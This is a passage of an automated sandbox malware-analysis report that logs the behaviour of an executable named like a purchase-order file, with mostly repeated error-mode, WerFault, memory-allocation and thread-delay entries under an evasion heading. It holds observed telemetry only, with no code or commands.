                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: Yara matchFile source: Process Memory Space: SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe PID: 7348, type: MEMORYSTR
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMemory allocated: 17D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMemory allocated: 33A0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMemory allocated: 17D0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMemory allocated: 93B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMemory allocated: A3B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMemory allocated: A5B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMemory allocated: B5B0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMemory allocated: 2800000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMemory allocated: 2950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeMemory allocated: 4950000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599868Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599655Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599327Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599218Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 599109Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598997Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598890Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598781Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598672Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598562Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598453Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598343Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598234Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598125Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 598015Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597906Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597796Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597687Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597578Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597468Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597358Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597244Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597140Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 597028Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596922Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596812Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596703Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596593Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596484Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596375Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596265Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596156Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 596046Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595937Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595718Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595280Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595171Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 594843Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 594734Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 594625Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6153Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3595Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeWindow / User API: threadDelayed 2135Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeWindow / User API: threadDelayed 7727Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7368Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7652Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -27670116110564310s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7696Thread sleep count: 2135 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -599868s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7696Thread sleep count: 7727 > 30Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -599765s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -599655s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -599547s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -599437s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -599327s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -599218s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -599109s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -598997s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -598890s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -598781s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -598672s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -598562s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -598453s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -598343s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -598234s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -598125s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -598015s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -597906s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -597796s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -597687s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -597578s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -597468s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -597358s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -597244s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -597140s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -597028s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -596922s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -596812s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -596703s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -596593s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -596484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -596375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -596265s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -596156s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -596046s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -595937s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -595828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -595718s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -595609s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -595500s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -595390s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -595280s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -595171s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -595062s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -594953s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -594843s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -594734s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exe TID: 7692Thread sleep time: -594625s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exe TID: 7832Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                Source: C:\Users\user\Desktop\SC110-11#U3000Order_Z01G-00008D Siparis PO15804-25 - H64PO1.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
